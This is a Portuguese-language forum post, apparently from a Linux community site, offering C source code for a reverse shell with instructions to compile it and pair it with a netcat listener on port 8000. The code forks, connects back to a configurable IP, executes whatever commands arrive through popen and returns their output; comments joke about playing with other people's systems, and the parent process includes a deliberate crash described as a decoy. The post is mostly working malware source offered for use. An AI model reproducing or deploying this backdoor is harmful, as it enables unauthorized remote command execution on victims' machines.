reverse shell na marra!
Publicado por felipe (última atualização em 11/12/2024)
[ Hits: 1.384 ]
Esse é um programa de reverse shell criado para linux, ele deve ser compilado e executado sem argumentos.
você deve usar o netcat junto, escutado na porta 8000, ou a que você definir, claro, você vai ter que mudar o ip também.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <unistd.h>
int main(int argc, char **argv)
{
//cria um segundo processo
pid_t pid;
struct sockaddr_in destino={
.sin_family = AF_INET,
.sin_port = htons(8000),
.sin_addr.s_addr = inet_addr("127.0.0.1")
};
//inicia
pid = fork();
if(pid < 0){
perror("pid error");
return 1;
}
if(pid == 0){
int sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0){
perror("socket error");
return 1;
}
int cnx = connect(sock, (struct sockaddr *)&destino, sizeof(destino));
if(cnx < 0){
perror("connet error");
return 1;
}
//brinca com sistema dos outros =p
FILE *cmd;
char buf[256];
char rec[256];
char *msg = "shell>";
while(1){
send(sock, msg, strlen(msg), 0);
recv(sock, rec, 256, 0);
cmd = popen(rec, "r");
while(fgets(buf, 256, cmd) != NULL){
send(sock, buf, strlen(buf), 0);
}
}
}
else{
//leve engano
//bufferOverFlow
int lol = atoi(argv[1]) * atoi(argv[2]);
}
return 0;
}
Cifra de Cesar - Cripto-Analise
Exploit para kernel 2.6.12-rc4
Esse código pode ser considerado um vírus?
intdb - gerador de wordlist numerica
Monitorando o Preço do Bitcoin ou sua Cripto Favorita em Tempo Real com um Widget Flutuante
IA Turbina o Desktop Linux enquanto distros renovam forças
Como extrair chaves TOTP 2FA a partir de QRCODE (Google Authenticator)
Como realizar um ataque de força bruta para desobrir senhas?
Como usar Gpaste no ambiente Cinnamon
Atualizando o Fedora 42 para 43
É normal não gostar de KDE? (15)
Erro ao instalar programa, "você tem pacotes retidos quebrados&qu... (13)









